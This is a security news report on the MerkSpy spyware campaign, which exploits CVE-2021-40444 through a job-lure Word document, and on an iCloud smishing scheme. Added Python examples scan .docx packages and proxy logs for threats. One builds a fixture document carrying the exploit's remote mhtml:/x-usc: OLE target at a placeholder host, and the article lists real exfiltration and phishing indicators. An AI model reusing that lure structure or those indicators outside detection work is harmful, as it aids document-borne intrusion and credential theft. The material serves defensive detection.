Unknown threat actors have been observed exploiting a now-patched security flaw in Microsoft MSHTML to deliver a surveillance tool called MerkSpy as part of a campaign primarily targeting users in Canada, India, Poland, and the U.S.
“MerkSpy is designed to clandestinely monitor user activities, capture sensitive information, and establish persistence on compromised systems,” Fortinet FortiGuard Labs researcher Cara Lin said in a report published last week.
The starting point of the attack chain is a Microsoft Word document that ostensibly contains a job description for a software engineer role.
But opening the file triggers the exploitation of CVE-2021-40444, a high-severity flaw in MSHTML that could result in remote code execution without requiring any user interaction. It was addressed by Microsoft as part of Patch Tuesday updates released in September 2021.
In this case, it paves the way for the download of an HTML file (“olerender.html”) from a remote server that, in turn, initiates the execution of an embedded shellcode after checking the operating system version.
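The following is an added defensive example, not code from the Fortinet report or from the campaign: a small Python scanner for the Word-document delivery stage. A .docx is a zip package, and the publicly documented CVE-2021-40444 lures rely on a relationship entry with TargetMode="External" pointing an OLE object at a remote URL in the mhtml:/x-usc: form, so the script walks every .rels part and reports external targets, flagging that shape. The sample document, the example.invalid host and the heuristic in is_suspicious_target are assumptions constructed for the demonstration; the only name taken from the article is the olerender.html filename.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
IMG_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"


def build_sample_docx() -> bytes:
    """Constructed minimal .docx (not a real sample). Its document relationships
    carry one external oleObject target in the mhtml:/x-usc: form associated with
    CVE-2021-40444 lures; the host example.invalid is a placeholder."""
    remote = "http://example.invalid/olerender.html"  # placeholder, constructed
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{PKG_RELS_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" '
        f'Target="mhtml:{remote}!x-usc:{remote}" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{IMG_REL_TYPE}" Target="media/image1.png"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def is_suspicious_target(rel_type: str, target: str) -> bool:
    """Heuristic (assumption): an OLE object fetched over the network, or any
    mhtml:/x-usc: target, matches the CVE-2021-40444 delivery shape."""
    t = target.lower()
    network = t.startswith(("http:", "https:", "mhtml:", "file:", "\\\\"))
    return "mhtml:" in t or "x-usc:" in t or (rel_type == OLE_REL_TYPE and network)


def find_external_relationships(docx_bytes: bytes) -> list:
    """Walk every .rels part in the OOXML package and report external targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG_RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts (images, styles, fonts) are normal
                rel_type = rel.get("Type", "")
                target = rel.get("Target", "")
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel_type.rsplit("/", 1)[-1],
                    "target": target,
                    "suspicious": is_suspicious_target(rel_type, target),
                })
    return findings


if __name__ == "__main__":
    for f in find_external_relationships(build_sample_docx()):
        flag = "SUSPICIOUS" if f["suspicious"] else "external"
        print(f"{flag:10} {f['part']} {f['id']} {f['type']} -> {f['target']}")
```

Run it against a real file by replacing build_sample_docx() with the bytes of the document under review; a legitimate linked image shows up as "external" but not "SUSPICIOUS", while a remote OLE target is exactly what a mail gateway or sandbox should block before Word ever renders it.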
“Olerender.html” takes advantage of “‘VirtualProtect’ to modify memory permissions, allowing the decoded shellcode to be written into memory securely,” Lin explained.
“Following this, ‘CreateThread’ executes the injected shellcode, setting the stage for downloading and executing the next payload from the attacker’s server. This process ensures that the malicious code runs seamlessly, facilitating further exploitation.”
The shellcode serves as a downloader for a file that is deceptively titled “GoogleUpdate” but, in reality, harbors an injector payload responsible for evading detection by security software and loading MerkSpy into memory.
The spyware establishes persistence on the host via Windows Registry changes such that it is launched automatically upon system startup. It also comes with capabilities to clandestinely capture sensitive information, monitor user activities, and exfiltrate data to external servers under the threat actors’ control.
This includes screenshots, keystrokes, login credentials saved in Google Chrome, and data from the MetaMask browser extension. All this information is transmitted to the URL “45.89.53[.]46/google/update[.]php.”
The development comes as Symantec detailed a smishing campaign targeting users in the U.S. with sketchy SMS messages that purport to be from Apple and aim to trick them into clicking on bogus credential harvesting pages (“signin.authen-connexion[.]info/icloud”) in order to continue using the services.
“The malicious website is accessible from both desktop and mobile browsers,” the Broadcom-owned company said. “To add a layer of perceived legitimacy, they’ve implemented a CAPTCHA that users must complete. After this, users are directed to a webpage that mimics an outdated iCloud login template.”
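Both stories above end in a network indicator printed in defanged form (the MerkSpy exfiltration URL and the iCloud phishing page). As an added example, not from Fortinet, Symantec or the article, here is a Python routine that refangs those two indicators and sweeps them through proxy logs, normalising host and path so that an explicit port, a different scheme or a trailing slash does not hide a match. The log lines are constructed in a Squid-style native format and are not real traffic; the two indicator strings are the ones the article prints.

```python
from urllib.parse import urlsplit

# Indicators exactly as printed in the article, defanged with "[.]".
DEFANGED_IOCS = [
    "45.89.53[.]46/google/update[.]php",
    "signin.authen-connexion[.]info/icloud",
]

# Constructed proxy log lines in a Squid-like native format (not real traffic):
# timestamp elapsed client action/code size method URL ident hierarchy type
SAMPLE_LOG = """\
1719800000.123 45 10.0.0.5 TCP_MISS/200 512 GET http://45.89.53.46/google/update.php - HIER_DIRECT/45.89.53.46 text/html
1719800001.456 30 10.0.0.7 TCP_MISS/200 2048 GET https://update.googleapis.com/service/update2 - HIER_DIRECT/142.250.0.1 text/xml
1719800002.789 28 10.0.0.9 TCP_MISS/200 3072 GET https://signin.authen-connexion.info/icloud/ - HIER_DIRECT/203.0.113.9 text/html
1719800003.000 12 10.0.0.5 TCP_MISS/200 100 POST http://45.89.53.46:80/google/update.php - HIER_DIRECT/45.89.53.46 text/plain
"""


def refang(ioc: str) -> str:
    """Undo common defanging so the indicator can be parsed as a URL."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").replace("[:]", ":")


def normalise(url: str):
    """Reduce a URL to (host, path); scheme, port, query and a trailing slash
    are ignored so cosmetic differences do not defeat the comparison."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path.rstrip("/") or "/"
    return host, path


def match_log(log_text: str, defanged_iocs) -> list:
    """Return (client_ip, url) for every request whose host+path matches an IoC."""
    wanted = {normalise(refang(i)) for i in defanged_iocs}
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # malformed or truncated line, skip rather than crash
        client, url = fields[2], fields[6]
        if normalise(url) in wanted:
            hits.append((client, url))
    return hits


if __name__ == "__main__":
    for client, url in match_log(SAMPLE_LOG, DEFANGED_IOCS):
        print(f"{client} contacted {url}")
```

The second request from 10.0.0.5 is a POST with an explicit port and still matches, which is the point of comparing normalised host and path rather than the raw string; a client that appears against the update.php indicator is a host to isolate and image, since the article describes that URL as the destination for keystrokes, screenshots and saved Chrome credentials.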